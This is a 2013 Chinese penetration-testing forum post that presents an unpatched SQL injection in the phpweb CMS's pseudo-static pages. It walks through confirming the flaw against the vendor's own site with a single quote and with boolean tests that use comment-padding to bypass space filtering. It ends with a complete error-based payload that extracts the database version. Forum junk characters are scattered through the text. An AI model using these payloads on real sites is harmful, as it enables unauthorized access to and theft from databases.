找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpweb伪静态页面注入0day
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2832|回复: 0
打印 上一主题 下一主题

phpweb伪静态页面注入0day

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-4 19:46:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
phpweb所有的整站程序伪静态页面都存在sql注入
: |& X0 B& |6 p0 [2 [+ o5 Y0 E$ M2 Q+ X- O
主站:http://phpweb.net/9 t! P3 u$ M9 p* ~& n$ U" Z
加’检测:6 ^- Y+ n9 t6 a, j# V* H+ b" p

% T6 v2 X. h6 bhttp://www.phpweb.net/down/html/?772′.html
, W/ V: Q1 D7 o4 m* C- @& ?
' f2 Y7 S: }0 j4 @& V出错$ O- G0 V! K; \6 l# L* p
存在注入。
$ d* _$ r4 d  w. `8 V) l+ g# F) j不能用空格,只能用/*罗& j7 Q) Z6 R4 K0 |% M8 W! j
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常; J7 ^3 ~% w% B0 c  `
' W  g  ]9 _- m' i& W. S
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
; P6 O' ^+ Y3 Q9 ]- h8 K; E3 y! k爆数据库版本:  P9 L4 ^" y, e+ R
+ e% ~6 G# f; b
?2 L2 i% ~: c2 |, R1 q
11 p; B+ h  m; m4 C, V
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html# f' k* T: s4 z
更新日期: 2013-01-03 13:39:50        
7 ?  |4 J! y4 u' k6 v
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表